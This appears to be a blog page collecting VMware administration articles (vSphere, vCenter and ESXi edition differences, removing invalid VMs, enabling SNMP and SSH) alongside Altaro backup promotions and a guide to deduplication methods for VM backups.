Storage costs are a significant concern for businesses, and choosing a VM backup provider that offers massive storage-saving features is essential. Few storage-saving features are as comprehensive as the Augmented Inline Deduplication Technology with the V9 VM Backup. The feature works by eliminating redundant data, resulting in significant storage savings.

This technology uses machine learning to identify the changed data from the previous backup, thus backing up only the changed data to the customers' backup server or repository. In comparison, most VM backup and restore services approach the backup process differently, removing identical data after the transfer to the backup repository.

The benefits of the technology result in massive storage savings.

Cloud Backup



Differences Between VMware vSphere, vCenter, ESXi Free vs ESXi Paid, Workstation Player & Pro

vmware esxi vsphere vcenter intro

In this article we will cover the differences between VMware ESXi, vSphere and vCenter, while also explaining the features supported by each vSphere edition: vSphere Standard, Enterprise Plus and Platinum. We will touch on the differences and limitations between VMware Workstation Player and VMware Workstation Pro, and also compare them with ESXi Free and ESXi Paid editions.

Finally we will demystify the role of vCenter and the additional features it provides to a VMware infrastructure.

Visit our Virtualization and Backup section for more high-quality technical articles.

vmware vsphere



Difference Between VMware vSphere & vCenter

It’s sometimes difficult to keep up to date with the latest names of software. Even the largest technology vendors change their product names from time to time. Unfortunately, getting the product name wrong can result in various costly consequences including purchasing the wrong product or an older version with differentiating feature sets.

Contrary to popular belief, vSphere and vCenter are actually different products:

  • vSphere is VMware’s name for a suite of Infrastructure products. You can think of it as a platform name which includes lots of different components.
  • vCenter is the name of one of the components under the vSphere suite. vCenter runs on a Windows Server VM and provides the management and control plane of the entire VMware environment. This is also shown in the diagram below:

differences between vsphere and vcenter

Looking at the vSphere suite, the components and features that vSphere includes depend on your licenses. vCenter Server is available on all vSphere editions.

Here is an overview of some features for the main vSphere editions:

vmware vsphere editions feature comparison

You will notice that this vSphere feature table contains many different technologies which are found in different VMware software components.

vCenter is a management tool that helps manage multiple ESXi / vSphere Hypervisors within the datacentre. Earlier versions of vCenter (also known as vCenter Server) ran exclusively on Windows Server (shown in the previous diagram), whereas VMware now offers the vCenter Server Appliance (vCSA), which runs on either SUSE Linux Enterprise Server 64-bit (vCSA v6.0) or VMware's proprietary Photon OS (vCSA v6.5 and above).

You log in to vCenter Server via an HTML5 browser client (formerly a Flash client), which looks like this:

vmware vsphere login

From here, we can manage all vSphere related components (and their corresponding features) which include:

  • vCenter Server (vCSA)
  • vSphere Hypervisors (ESXi Servers)
  • vSphere Update Manager
  • vSphere Replication

So, in summary, the difference between vSphere and vCenter is that vSphere consists of a suite of VMware components with vCenter Server being one of those.

vCenter Server is the management software or if you prefer, tool, to help manage your vSphere Components and all their features.

You can use some vSphere components without a vCenter Server but some features will not be available.

What is VMware ESXi?

ESXi is a Type-1 Hypervisor which means it’s a piece of software that runs directly on a bare-metal server without the requirement of an operating system. As a Hypervisor, ESXi manages access to all physical resources such as CPUs, memory, network interface cards, storage (HDD, SSDs etc) and other.

ESXi’s vmkernel sits between the virtual machines and physical hardware and from there it shares the available hardware including CPUs, storage (HDDs, SSDs etc), memory and network interfaces of the physical host amongst the multiple virtual machines. Applications running in virtual machines can access these resources without direct access to the underlying hardware.

The vmkernel is the core software responsible for receiving resource requests from virtual machines and presenting them to the physical hardware.

There are stricter compatibility requirements for ESXi installations as hardware drivers need to be certified. However once ESXi is installed and operational, you get access to Enterprise-grade Virtual Machines features.

VMware ESXi GUI Interface - Click to enlarge

VMware ESXi comes in a variety of flavours. A free version exists if you simply need to deploy basic Virtual Machines with no High Availability or central management requirements. This is best suited for trialling software and labs which are not in production.

For mission-critical applications, you should consider the paid version of ESXi, which comes with VMware support and features geared toward professional environments. Add on VMware's vCenter Server to enable central management of all your ESXi servers and take your datacentre one step further with features such as:

  • Clustering
  • High Availability
  • Fault Tolerance
  • Distributed Resource Scheduler
  • Virtual Machine Encryption

Difference Between VMware ESXi Free & ESXi Paid Version

The VMware ESXi free vs ESXi paid debate comes up a lot, but fortunately, it is easily answered.

The question to ask yourself is if you are planning to run mission-critical applications on top of ESXi. By mission-critical we mean applications that your business depends on. If the answer is yes, then you will require the paid version of ESXi with support so that you can contact VMware should anything go wrong.

Even if the answer is no, you might still consider a paid version of ESXi if you need the management functions of vCenter Server. Such use cases might be large development companies who don’t consider their test and development environments mission-critical but they do want a way to manage hundreds or thousands of Virtual Machines.

VMware ESXi free is still feature-rich though. Therefore, for a small environment where your business won't grind to a halt if an ESXi server goes offline, the free version might be cost-effective even with the additional manual management tasks involved. Keep in mind though that backup features will not be available in the free version, meaning that native backup via ESXi won't be possible. You can work around this by installing and managing backup agents within your operating systems. This is one example of management overhead that you wouldn't have with a paid version.

When Do You Need vCenter?

It’s worth keeping in mind that even with a paid version of ESXi, you will still need a vCenter Server license to use any clustering features. A paid version of ESXi does offer some benefits (such as VADP backup abilities) but without a vCenter Server license, most of the benefits are not available.

Almost all customers of paid ESXi licenses will also purchase a vCenter Server license so that those licensed ESXi servers can be centrally managed. Once all ESXi servers are managed by vCenter Server, you unlock all the ESXi features that you are licensed for.

So when do you need a vCenter Server? The answer is simple: to unlock features such as Clustering, High Availability (automatic restart of VMs from a failed host on a healthy host), Cloning and Fault Tolerance. If you are looking to add other VMware solutions to the datacentre, including vSAN, vSphere Replication or Site Recovery Manager, then all of those solutions require access to a vCenter Server.

In summary, if you find that you need the paid ESXi version then you are most likely also going to need a vCenter Server license too. Fortunately, VMware provides Essentials and Essentials Plus bundles with a 3-host (physical server) limit; these bundles include ESXi and a vCenter Server license at a discounted rate to keep initial costs down.

Just by looking at the vSphere Client you can see the various vCenter-related options, which show the value added by bolting vCenter onto your stack of datacentre management software:

vmware vsphere client
VMware vsphere client - Click to enlarge

VMware Workstation Player vs VMware Workstation Pro

VMware Workstation Player is free software that lets you run a Virtual Machine on top of your own Windows PC's operating system. There are two versions of VMware Workstation: Workstation Player and Workstation Pro.

The key differences between these two versions are that with VMware Workstation Player you can only run one Virtual Machine on your computer at once and enterprise features are disabled.  VMware Workstation Pro on the other hand supports running multiple virtual machines at the same time plus a few more neat features mentioned below.

Here is what Workstation Pro looks like - notice how you can have many virtual machines running at once:

vmware workstation pro VMware Workstation Pro - Click to enlarge

VMware Workstation is essentially an application installed on top of Windows which lets you run connected or isolated Virtual Machines. It's best suited for developers who need access and control to deploy and test code, or for systems administrators looking to test applications on the latest version of a particular operating system, of which over 200 are supported in Workstation Player and Pro.

We've already explained that Workstation Player is the free version of Workstation Pro, but when it comes to functional differences we've detailed those for you below:

vmware player workstation pro feature comparison

VMware Workstation Player and Pro both get installed onto your Windows PC or laptop, on which you can run your virtual machines. Pro is interesting because you can run as many Virtual Machines as your Windows PC or laptop hardware can handle, making it a great bit of software for running live product demonstrations or testing without needing access to remote infrastructure managed by another team. The key element here is to ensure your laptop or PC has enough resources available (CPU/cores, RAM and HDD space) for the Virtual Machines that will be running on it.

Diving into some of the features that VMware Workstation Pro provides shows how much value for money the software offers. Being able to take a snapshot of Virtual Machines is useful, so that you can roll back a Virtual Machine to a particular date and time in just a few seconds. You can also clone Virtual Machines should you need many copies of the same VM for testing. Encryption is also available in the event that your local Virtual Machines contain sensitive information.

VMware Workstation Pro is, therefore, a mini version of ESXi. It's not capable of clustering features, but it is an extremely cost-effective way (approximately $300 USD) to make use of some of the unused resources on your Windows machine.

Summary

In summary here are our definitions for everything covered in this article:

  • vSphere: vSphere is a naming convention or “brand” for a selection of VMware Infrastructure solutions including vCenter Server, ESXi, vSphere Replication and Update Manager.
  • vCenter Server: vCenter Server is one of the solutions under the vSphere suite. It is used to manage multiple ESXi servers and enables cluster-level and high availability features for ESXi servers and Virtual Machines. vCenter Server is generally purchased when paid versions of ESXi have been deployed.
  • Workstation Player: Workstation Player is free software by VMware that lets you run one Virtual Machine at a time within your Windows Operating System.
  • Workstation Pro: Workstation Pro is the same as Workstation Player but it requires a paid license which enables enterprise features such as the ability to run many Virtual Machines from your Windows PC or Laptop. Features such as Virtual Machine snapshots, cloning and encryption are also supported with Pro.
  • ESXi: ESXi is the enterprise-grade solution for running Virtual Machines in the datacentre. It is installed onto bare metal servers. There is a basic free version, suitable for labs and test environments but the paid versions are more suitable for running mission-critical virtual machines and applications for your business, enabling cluster level features such as High Availability.

5 Most Critical Microsoft M365 Vulnerabilities Revealed and How to Fix Them - Free Webinar

Microsoft 365 is an incredibly powerful software suite for businesses, but it is becoming increasingly targeted by people trying to steal your data. The good news is that there are plenty of ways admins can fight back and safeguard their Microsoft 365 infrastructure against attack.

5 Most Critical Microsoft M365 Vulnerabilities and How to Fix Them

This free upcoming webinar, on June 23 and produced by Hornetsecurity/Altaro, features two enterprise security experts from the leading security consultancy Treusec - Security Team Leader Fabio Viggiani and Principal Cyber Security Advisor Hasain Alshakarti. They will explain the 5 most critical vulnerabilities in your M365 environment and what you can do to mitigate the risks they pose. To help attendees fully understand the situation, a series of live demonstrations will be performed to reveal the threats and their solutions covering:

  • O365 Credential Phishing
  • Insufficient or Incorrectly Configured MFA Settings
  • Malicious Application Registrations
  • External Forwarding and Business Email Compromise Attacks
  • Insecure AD Synchronization in Hybrid Environments

This is truly an unmissable event for all Microsoft 365 admins!

The webinar will be presented live twice on June 23 to enable as many people as possible to join the event live and ask questions directly to the expert panel of presenters. It will be presented at 2pm CEST/8am EDT/5am PDT and 7pm CEST/1pm EDT/10am PDT.

 


The Backup Bible. A Free Complete Guide to Disaster Recovery, Onsite - AWS & Azure Cloud Backup Strategies. Best Backup Practices

onprem and cloud backup

The Free Backup Bible Complete Edition, written by backup expert and Microsoft MVP Eric Siron, comprises 200+ pages of actionable content divided into 3 core parts, including 11 customizable templates enabling you to create your own personalized on-prem and cloud-based (AWS, Azure) backup strategy.

Part 1 and 2 are updated versions of previously released eBooks (Creating a Backup & Disaster Recovery Strategy and Backup Best Practices in Action) but Part 3 is a brand-new section on disaster recovery (Disaster Recovery & Business Continuity Blueprint) that includes tons of valuable insights into the process of gathering organizational information required to build a DR plan and how to carry it out in practical terms.

The Backup Bible is offered Free and is available for download here.

Let’s take a look at what’s covered:

The Backup Bible – Part 1: Fundamentals of Backup

Part 1 covers the fundamentals of backup and tactics that will help you understand your unique backup requirements. You'll learn how to:

  • Begin planning your backup and disaster recovery planning
  • Set recovery objectives and loss tolerances
  • Translate your business plan into a technically oriented outlook
  • Create a customized agenda for obtaining key stakeholder support
  • Set up a critical backup checklist

The Backup Bible – Part 2: Selecting your Backup Strategy

Part 2 shows you what an exceptional backup looks like on a daily basis and the steps you need to get there, including:

  • Choosing the Right Backup and Recovery Software
  • Setting and Achieving Backup Storage Targets
  • Securing and Protecting Backup Data
  • Defining Backup Schedules
  • Monitoring, Testing, and Maintaining Systems

The Backup Bible – Part 3: Aligning Disaster Recovery Strategies to your Business Needs

Part 3 guides you through the process of creating a reliable disaster recovery strategy based on your own business continuity requirements, covering:

  • Understanding key disaster recovery considerations
  • Mapping out your organizational composition
  • Replication
  • Cloud solutions
  • Testing the efficacy of your strategy

the backup bible

One of the most useful features of The Backup Bible is the customizable templates and lists that enable the reader to put the theory into practice. These are found in the appendix but are linked in the text at the end of each relevant chapter. If you are going to read this book cover to cover it would be a good idea to fill out the templates and lists as you go through it, so by the time you’ve finished reading you’ll have a fully personalized backup action plan ready for you to carry out!

Sure, it’s not the most exciting aspect of an IT administrator’s job but having a reliable and secure backup and disaster recovery strategy could be the most important thing you do. I’m sure you’ve heard many data loss horror stories that have crippled organizations costing thousands, if not millions, of dollars. This free eBook from Altaro will make sure you’re not the next horror story victim.

Summary

The Backup Bible Complete Edition also works as a great reference guide for all IT admins and anyone with an interest in protecting organizational data. And the best thing of all: it’s free! Learn how to create your own backup and disaster recovery plan, protect and secure your data backup for both onsite/on-premises and cloud-based (AWS and Azure) installations plus more. What are you waiting for? Download your copy now!


SysAdmin Day 2020 - Get your Free Amazon Voucher & Gifts Now!

sysadmin day 2020 amazon voucher

SysAdmin Day has arrived, and with it, gratitude for all the unsung heroes that 2020 has needed. Your hard work has made it possible for all of us to keep going, despite all challenges thrown our way. Now it is Altaro’s turn to thank YOU.

If you are an Office 365, Hyper-V or VMware user, celebrate with Altaro. Just sign up for a 30-day free trial of either Altaro VM Backup or Altaro Office 365 Backup – it's your choice!

sysadmin day 2020 altaro
What can you Win?

  • Receive a €/£/$20 Amazon voucher when you use your trial of Altaro Office 365 Backup or Altaro VM Backup.
  • Get the chance to also win one of their Grand Prizes by sharing your greatest 2020 victory with Altaro in a video of up to 60 seconds.

What are you waiting for? Sign up now!


How to Fix VMware ESXi Virtual Machine 'Invalid Status'

In this article, we'll show you how to deal with VMs reported to have an Invalid Status, as shown in the screenshot below. This is a common problem many VMware and System Administrators are faced with. We'll show you how to enable SSH on ESXi (required for this task), use vim-cmd to obtain a list of the invalid VMs, use the vim-cmd /vmsvc/unregister command to unregister (delete) the VMs, and edit the /etc/vmware/hostd/vmInventory.xml file to remove the section(s) that reference the invalid VM(s).

The Invalid Status issue is usually caused by a failed attempt to delete a VM, manually removing VM files after a vMotion, a problem with the VMFS storage, or physically removing the storage from the ESXi host, e.g. when replacing a failed HDD.

esxi vm machine invalid status

Another difficulty with VMs stuck in an Invalid Status is that VMware will not allow you to remove or delete any Datastore associated with the VM, e.g. if you wanted to remove an HDD. For safety reasons, you must first remove or migrate the affected VM so that no VM is associated with the Datastore before VMware allows you to delete it.

Concerned about your VM machines and their data? Download now your Free Enterprise-grade VM Backup solution


The screenshot below shows ESXi failing to delete datastore 256G-SSD - which is used by VM FCX-ISE1 above, now reported to be in an Invalid Status:

esxi vm unable to delete datastore

As most System Administrators discover in these situations, they are pretty much stuck: the only way to remove the VM, now marked as 'Invalid', is to delete it, as the Unregister option cannot be selected when right-clicking on the VM:

esxi vm invalid status delete unregister option unavailable

Notice in the screenshot above how the Unregister or Delete menu options are not available.

The only method to delete this VM is to use the SSH console on the ESXi host and execute a number of commands. This requires SSH to be enabled on the ESXi host.

Read our quick guide on “How to enable SSH on an ESXi host” if SSH is not enabled on your ESXi host.

Once SSH is enabled, connect to your ESXi host with any SSH client (e.g. PuTTY) using your ESXi root credentials, then use the vim-cmd command with the following parameters to obtain a list of the invalid VMs:

[root@esxi1:~] vim-cmd vmsvc/getallvms | grep invalid
Skipping invalid VM '8'
[root@esxi1:~]

From the command output it is apparent that VM No.8 is the one we are after. As a last attempt, we can try to reload the VM in the hope that it will rectify the problem, by executing the vim-cmd vmsvc/reload command:

[root@esxi1:~] vim-cmd vmsvc/reload 8
(vmodl.fault.SystemError) {
   faultCause = (vmodl.MethodFault) null,
   faultMessage = <unset>,
   reason = "Invalid fault"
   msg = "Received SOAP response fault from [<cs p:03d09848, TCP:localhost:80>]: reload
vim.fault.InvalidState"
}

Unfortunately, no joy. We now need to proceed to unregister/delete the VM using the vim-cmd /vmsvc/unregister command as shown below:

[root@esxi1:~] vim-cmd /vmsvc/unregister 8

Once the command is executed, the invalid VM will magically disappear from the ESXi GUI:

esxi vm machine invalid vm deleted
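
To confirm the VM is indeed gone from the inventory, you can optionally re-run the earlier discovery command from the same SSH session; if the unregister was successful, no 'Skipping invalid VM' lines should be returned:

vim-cmd vmsvc/getallvms | grep invalid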

Another way to delete the VM is to edit the /etc/vmware/hostd/vmInventory.xml file and remove the section that references the invalid VM. In the snippet below, we simply need to remove the ConfigEntry block that references the invalid VM (id 0008 in our example):

<ConfigRoot>
  <ConfigEntry id="0000">
    <objID>1</objID>
    <secDomain>23</secDomain>
    <vmxCfgPath>/vmfs/volumes/5a87661c-a465347a-a344-180373f17d5a/Voyager-DC/Voyager-DC.vmx</vmxCfgPath>
  </ConfigEntry>
  …………
  <ConfigEntry id="0008">
    <objID>8</objID>
    <secDomain>54</secDomain>
    <vmxCfgPath>/vmfs/volumes/   </vmxCfgPath>
  </ConfigEntry>

</ConfigRoot>

When finished, simply save the vmInventory.xml file.
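
Note that if you go down the manual-edit route, the hostd management agent typically needs to re-read the inventory file before the change is reflected in the GUI. A minimal sketch, assuming you still have SSH or console access to the host, is to restart the management agent (be aware this briefly interrupts management connections to the host):

/etc/init.d/hostd restart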

Summary

This article showed how to deal with an ESXi VM that is in an invalid status. We explained possible causes of this issue, how to enable SSH on ESXi and the SSH commands required to reload or delete the invalid VM. Finally we saw how to delete a VM by executing the vim-cmd /vmsvc/unregister command or editing the vmInventory.xml XML file.


How to Enable SNMP on VMware ESXi Host & Configure ESXi Firewall to Allow or Block Access to the SNMP Service

In this article we will show you how to enable SNMP on your VMware ESXi host, configure SNMP Community string and configure your ESXi firewall to allow or block access to the SNMP service from specific host(s) or network(s)

Enabling the SNMP service on a VMware ESXi host is considered mandatory in any production environment, as it allows a Network Monitoring System (NMS) to access and monitor the ESXi host(s) and obtain valuable information such as CPU, RAM and storage usage, vmnic (network) utilization and much more.

how to enable snmp on esxi host

Furthermore, an enterprise grade NMS system can connect to your VMware infrastructure and provide alerting, performance and statistical analysis reports to help better determine sizing requirements but also identify bottlenecks and other problems that might be impacting the virtualization environment.

Execution Time: 10 minutes


Concerned about your VM machines and data? Download now your Free Enterprise-grade VM Backup solution

Enable SSH on ESXi

The first step is to enable SSH on ESXi. This can be easily performed via the vSphere client, ESXi console or Web GUI. All these methods are covered in detail in our article How to Enable SSH on VMware ESXi.

Enable and Configure ESXi SNMP Service

Once SSH has been enabled, ssh to your ESXi host and use the following commands to enable and configure the SNMP service:

esxcli system snmp set --communities COMMUNITY_STRING
esxcli system snmp set --enable true

Replace “COMMUNITY_STRING” with the SNMP string of your choice.
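
Optionally, before moving on you can confirm that the agent picked up the settings by printing the running SNMP configuration (community strings, port, enable state) with the read-only command below:

esxcli system snmp get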

Enable SNMP on ESXi Firewall

The next step is to add a firewall rule to allow inbound SNMP queries to the ESXi host. There are two scenarios here:

  • Allow traffic from everywhere
  • Allow traffic from specific hosts or networks

Allow SNMP Traffic from Everywhere

The rules below allow SNMP traffic from everywhere – all hosts and networks:

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all true
esxcli network firewall ruleset set --ruleset-id snmp --enabled true

Allow SNMP Traffic from Specific Hosts or Networks

The rules below allow SNMP traffic from host 192.168.5.25 and network 192.168.1.0/24:

esxcli network firewall ruleset set --ruleset-id snmp --allowed-all false
esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.5.25
esxcli network firewall ruleset allowedip add --ruleset-id snmp --ip-address 192.168.1.0/24
esxcli network firewall ruleset set --ruleset-id snmp --enabled true
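
If you later need to review which hosts or networks are currently allowed, the SNMP ruleset and its allowed IP list can be inspected with the commands below (a quick sketch; the exact output format may vary slightly between ESXi versions):

esxcli network firewall ruleset list --ruleset-id snmp
esxcli network firewall ruleset allowedip list --ruleset-id snmp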

Block Host or Network from Accessing SNMP Service

To block a previously allowed host or network from accessing the SNMP service simply execute the following command(s):

esxcli network firewall ruleset allowedip remove --ruleset-id snmp --ip-address 192.168.5.25
esxcli network firewall ruleset allowedip remove --ruleset-id snmp --ip-address 192.168.1.0/24

Restart SNMP Service

Now that everything is configured, all we need to do is restart the SNMP service using the following command:

/etc/init.d/snmpd restart
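
Once the service has restarted, it is worth verifying that the host answers SNMP queries from the machine your NMS polls from. A minimal test using the Net-SNMP snmpwalk utility on a Linux host is shown below, where COMMUNITY_STRING and 192.168.1.10 are placeholders for your own community string and ESXi management IP:

snmpwalk -v2c -c COMMUNITY_STRING 192.168.1.10 1.3.6.1.2.1.1

The command walks the standard system MIB and should return entries such as sysDescr and sysUpTime if SNMP is working and the firewall rules are in place.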

Summary

In this article we explained the importance and usage of the SNMP Service for VMware ESXi Hosts and vCenter. We explained how to enable the SNMP Service on an ESXi host, configure the SNMP community string (public/private) and provided examples on how to configure the ESXi Firewall to control SNMP access to the ESXi host.


How to Enable or Disable SSH on VMware ESXi via Web GUI, vSphere Web GUI (vCenter), vSphere Client and Shell Console

SSH access to VMware’s ESXi server is disabled by default; however, there are many cases where SSH might be required. VMware and System administrators often need to perform advanced administrative tasks that require SSH access to the ESXi host. For example, deleting or reloading a VM with an Invalid Status can only be performed via SSH.

In this article, we’ll show you how to enable SSH on your ESXi host with just a few simple steps. This task can be achieved via the ESXi Web GUI, vSphere Web GUI (vCenter), vSphere client or ESXi console. We’ll cover all four methods.

Execution Time: 5 minutes

Security Tip: If your ESXi host management IP is not protected or isolated from the rest of the network, it is advisable to enable SSH on an as-needed basis.

Enabling and Disabling SSH Console on VMware ESXi via Web GUI

Log into your ESXi server and select the host from the Navigator window. Next, go to Action > Services and select the Enable Secure Shell (SSH) menu option:

vmware esxi enable ssh

This will immediately enable SSH. To disable SSH, repeat the same steps. You’ll notice that the Disable Secure Shell (SSH) option is now available:

vmware esxi disable ssh

Enabling and Disabling SSH on VMware via vSphere Web GUI Client (vCenter)

For those with a VMware vCenter environment, you can enable SSH for each ESXi host by selecting the host and then going to Manage > Settings > Security Profile > Edit. In the pop-up window, scroll down to SSH Server and tick it. Optionally, enter the IP address or network(s) that should be allowed SSH access to the host:

vmware esxi enable ssh vsphere web gui

Enabling and Disabling SSH on VMware ESXi via vSphere Client

Launch your vSphere client and log into your ESXi host. From vSphere, click on the ESXi host (1), then select the Configuration tab (2). From there, click on the Security Profile (3) under the Software section. Finally click on Properties:

vmware esxi enable ssh via vsphere client

On the pop-up window, select SSH and click on the Options button:

vmware esxi enable ssh via vsphere client remote access

Select the required Startup Policy. Note that the ‘Start and stop with host’ option will permanently enable SSH. Next, click on the Start button under Service Commands to enable SSH immediately. When done, click on the OK button:

vmware esxi enable ssh via vsphere client start stop

To disable the SSH service via vSphere, follow the same process as above, ensure you select the “Start and stop manually” Startup Policy option and click on the Stop button under the Service Commands section.

Enabling and Disabling SSH Console on VMware ESXi via ESXi Console

From your ESXi console, hit F2 to customise the system:

vmware esxi enable ssh via console

At the prompt, enter the ESXi root user credentials:

vmware esxi enable ssh via console

At the next window, highlight Troubleshooting Options and hit Enter:

vmware esxi enable ssh via console

Next, go down to the Enable SSH option and hit Enter to enable SSH:

vmware esxi enable ssh via console

Notice that ESXi is now reporting that SSH is enabled:

vmware esxi enable ssh via console 5

Now hit Esc to exit the menu and logout from the ESXi host console.
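
As a side note, if you already have local shell access to the host (for example via the ESXi Shell enabled from the same Troubleshooting Options menu), SSH can also be toggled from the command line using vim-cmd. A brief sketch, assuming these commands are available on your ESXi version:

vim-cmd hostsvc/enable_ssh
vim-cmd hostsvc/start_ssh

vim-cmd hostsvc/stop_ssh
vim-cmd hostsvc/disable_ssh

The first two commands enable and start the SSH service; the last two stop and disable it again.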

Summary

In this article we showed how to enable and disable the SSH service on a VMware ESXi host using the Web GUI, vSphere Web GUI (vCenter), vSphere client and ESXi Console. We explained why the SSH service sometimes needs to be enabled and also noted the security risks of permanently enabling SSH.


World Backup Day with Free Amazon Voucher and Prizes for Everyone!

Celebrate World Backup Day and WIN with Altaro!

We all remember how grateful we were to have backup software when facing so many data loss mishaps and near-catastrophes.

world backup day 2020 - win with altaro

If you manage your company's Office 365 data, celebrate this World Backup Day with Altaro. All you have to do is sign up for a 30-day free trial of Altaro Office 365 Backup. There’s a guaranteed Amazon voucher in it for you, and if you share your biggest backup mishap with them, you get a chance to WIN one of the grand prizes:

  • DJI Mavic Mini Drone FlyCam Quadcopter
  • Google Stadia Premiere Edition
  • Ubiquiti UniFi Dream Machine
  • Logitech MX Master 3 Advanced Wireless Mouse

What are you waiting for? The offer expires on the 22nd of April, so sign up now!

Good luck & happy World Backup Day! 

 


Understanding Deduplication. Complete Guide to Deduplication Methods & Their Impact on Storage and VM Backups

data deduplication process vm backup

When considering your VM backup solution, key features such as deduplication are incredibly important. This is not simply from a cost perspective but also an operational one. While it is true that deduplication of your backup data can deliver considerable cost savings for your business, it is also true that the wrong type of deduplication can often hurt performance and contribute to a negative end-user experience.

This article will explore the various deduplication types including general Inline Deduplication and Altaro’s Augmented Inline Deduplication for your VM Backup Storage. We'll also cover deduplication concerns such as software interoperability, disk wear, performance and other important areas.


Concerned about your VM machines and their data? Download now your Free Enterprise-grade VM Backup solution


Deduplication Basics

In fundamental terms, deduplication is the process of minimizing the amount of physical storage required for your data. In this article, we are using your VM backups as the data subject.

While physical storage costs are improving year on year, storage is still a considerable cost for any organization, which is why deduplication techniques are being included in common data handling products such as backup software for your Virtual Machines.

There are various forms of deduplication available and it’s imperative to understand each one as all of them have various cost-saving vs performance trade-offs.

File-Based Deduplication

File-based deduplication was popular in the early days of deduplication; however, this method’s shortcomings quickly became apparent. With this method, files would be examined and checked to ensure identical files weren’t stored a second time. The problem was that much of a file could be identical to other files despite being named differently and having a different time-stamp. Furthermore, other file-level differences would make the deduplication engine mark the file as unique, forcing the whole file to be backed up.

The end result is a significant amount of data being backed up multiple times, reducing the efficiency of the file-based deduplication engine.

Block-Level Deduplication

Block-level deduplication is the evolution of file-based deduplication which successfully addresses the shortcomings of its predecessor. With this method, the deduplication engine now examines the raw blocks of data on the filesystems themselves.  By concentrating on the raw blocks of data the deduplication engine no longer worries about the overall file a block is part of and can accurately understand the type of data the raw block contains.

The end result is a very efficient and intelligent deduplication engine that is capable of saving more space on the backup target.

To help better understand the block-level deduplication engine, we’ve included an example of how this process works with Altaro’s VM Backup solution.  Our example consists of 3 VMs and the diagram shows how each VM’s data is broken into different blocks (A to E).

In Phase 1, block-level deduplication is performed across each VM resulting in a significant saving of 110GB of space across all VMs. In Phase 2, block-level deduplication is performed across all VMs achieving an amazing 118GB reduction of storage space!

So far, Altaro’s VM Backup has saved 228GB of storage space which represents an impressive 47% reduction of VM Backup storage! In Phase 3, the deduplicated data is compressed to just 151GB and transferred to the backup storage.

block level deduplication vm backup

As noted in the diagram above, the overall VM backup storage requirements have been reduced from 481GB to just 151GB – representing a 68.8% reduction in size and allowing you to have more backups using much less storage space.

Download your free copy of Altaro's VM Backup Solution - Free for specific number of physical hosts!

Post-Process Deduplication

Compared to other deduplication options, post-process deduplication is a simpler form. All VM backup data is first sent to the target backup storage device. After this, on a schedule, a process runs on the backup device to remove duplicated data.

post process deduplication

While this is simple in that no agents are required on your Virtual Machines, your target backup device will need to be large enough to cater for all backup data. Only after the data is there will you see a reduction, in time for the next day’s worth of backups.

Post-process deduplication is also problematic because you might need to enforce a “blackout window”: a period of time when you should not perform any backups because the storage device is busy moving data around and running the deduplication process.

The benefit of post-process deduplication though, is that it does deduplicate your data and not only on a per VM or per backup window but it often (depending on the implementation and vendor) will deduplicate across all backed up data. This can have a massive space-saving benefit, but only after the deduplication process has run.

Inline Deduplication

Inline Deduplication is an intelligent form of deduplication because it usually runs deduplication algorithms (processing) as the data is being sent to the target storage device. In some cases, the data is processed before it is sent along the wire.

inline deduplication process

In these scenarios, you can benefit from a target storage device with a lower storage capacity than traditionally required, reducing your backup storage target costs. Depending on the type of data being backed up and the efficiency of your vendor’s deduplication technology, savings can vary significantly.

Consider a scenario where you are backing up the same operating system a hundred or more times; deduplication savings would be expected to be quite good.

Since inline deduplication does not run on the target storage device, the performance degradation on the device is typically lower than with other methods. This leaves more throughput available for additional backups to run, allowing your VM backups to complete within their scheduled backup windows.

The main benefits of inline-deduplication are that your target storage device can have a lower capacity than originally required, additional similar workloads will not add much data to the target and the storage target performance is better than when using other deduplication options. You also benefit from less disk wear which can cause a problem with both HDD and SSD drive types.

One drawback, though, is that depending on the implementation, in-line deduplication might not deduplicate your VM backup job’s data against all data already on the target storage array. The implementation could work on a per-VM or per-job basis, resulting in lower deduplication benefits than other methods.

Augmented Inline Deduplication

Augmented in-line deduplication is an implementation of in-line deduplication used by Altaro’s VM backup solution.

In this implementation, variable block sizes are used to maximise deduplication efficiency. This is all achieved with very low memory and CPU requirements, allowing more backups to fit in less space than without any deduplication in place.

deduplication and compression

Another important consideration here is that less bandwidth is required to ship your VM backup data to the backup storage system. If your backup infrastructure is located in a different building or geographic location, bandwidth can get expensive. Now that data is deduplicated before it is sent across the wire, the bandwidth requirements are reduced significantly.

Altaro’s implementation is impressive because it’s a form of inline deduplication, promising deduplication across all backed up data.

In the graphic below we can see that data is shipped to a central backup target from various Virtual Machines. While this is happening, deduplication processes are running.

vm backup with augmented inline deduplication

The benefits of such a solution are clear:

  • Very Fast backups. There is no storage performance lost as there are no post-processes running on the storage target.
  • Excellent deduplication rates. Deduplication occurs between the source data and ALL data on the backup target. If the data is already in the backup storage device, it will not be copied to the destination storage again, saving space.
  • No operational overhead. There are no agents to install or manage. Installation of the feature is a simple checkbox.
  • No additional SSD or HDD wear on the target. Since there are no post-processes there is no “double touch” of the backed up data. This significantly reduces the wear on HDDs and SSDs resulting in fewer disk failures.

Deduplication Gotchas

“If your backup software comes with deduplication as standard, there is no reason not to use it.” This statement is incorrect! You must consider the type of deduplication in use and the overall impact it has on your backup systems.

Software Interoperability

A key consideration when analysing backup solutions is feature interoperability. Some backup vendors will not support deduplication with other features. An example of this is a storage device which runs post-process deduplication combined with backup software that supports instant VM recovery.

Instant VM recovery, direct from the backup target, can be a very beneficial feature for your business; however, you must ensure that the vendor supports this feature on deduplicated storage targets (if this is the type of system your business has in place).

Performance

From a performance perspective, there is no point in having a smart deduplication system if it’s slowing your backups down to the point you cannot complete them. Be sure to trial deduplication features to correctly assess the performance impact on your platforms. Also ensure that there is little or no impact on production Virtual Machines. We know that post-process deduplication has no effect on production workloads, but it is possible that in-line deduplication does, so it should be tested.

A quick way to check performance would be to compare backup times before enabling deduplication features with afterwards. From here you can look at a cost-saving vs performance analysis to consider which is better for your business.

Disk Wear

Take a look at the SMART data for your disks after deduplication has been enabled for an extended period of time. If the wear-out time on SSDs is significantly reduced, consider an inline deduplication feature rather than post-process.

Operations

If enabling deduplication means installing, upgrading and generally managing agents everywhere, consider another solution which does not require agents. Agents will also consume CPU and Memory which can negatively impact the end-user experience of your applications.

For post-process deduplication ensure you are not limited to time windows for your backups and restores. Also, check the performance of this feature, especially on large backup targets.

The Impact of Augmented Inline Deduplication for VM backups

